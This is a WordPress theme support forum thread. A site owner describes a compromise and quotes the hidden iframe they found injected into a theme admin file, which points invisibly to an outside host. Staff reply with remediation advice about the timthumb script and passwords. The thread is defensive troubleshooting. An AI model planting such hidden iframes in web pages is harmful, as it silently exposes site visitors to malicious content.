Home / Forums / DynamiX Support / pluggable.php error

Viewing 3 posts - 1 through 3 (of 3 total)
  • Author
    Posts

  • nutratec
    Participant

    Hi there,

    I´m having troubles with my web site… every time I try to publish a post or page I get this error mesage

    "Warning: Cannot modify header information – headers already sent by (output started at E:inetpubvhostsnutratec.pthttpdocswp-contentthemesDynamiXlibadmindex.php:1) in E:inetpubvhostsnutratec.pthttpdocswp-includespluggable.php on line 934"

    And now, every images of my web site http://www.nutratec.pt are not showing.

    I really need your help in this one.

    thanks


    nutratec
    Participant

    HI again,

    My /wp-content/themes/DynamiX/lib/adm/inde.php ha an iframe code hiden that looked like this "<iframe src="http://hotels-globe.com/css/.del/index.php&quot; width="10" border="1" height="10" style="visibility:hidden"></iframe>", after i deleted it, the wordpress started to work just fine again.

    How can I protect my files against this atacks, i think it is a trojan, but i didn't find a protection against it in the online foruns.

    Can you help me with this issue, i really nedd help on it…

    Thanks for your cooperation

    JD

    Andy
    Andy
    Keymaster

    Hey JD,

    It maybe worth upgrading the timthumb script – DynamiX/lib/scripts/timthumb.php with the latest from here http://timthumb.googlecode.com/svn/trunk/timthumb.php

    That's the only thing I can think of where it may have been able to get into. Make sure you change all your passwords for WP. 

    This tool is also useful http://codegarage.com/blog/2011/09/wordpress-timthumb-vulnerability-scanner-plugin/

Viewing 3 posts - 1 through 3 (of 3 total)

You must be logged in to reply to this topic.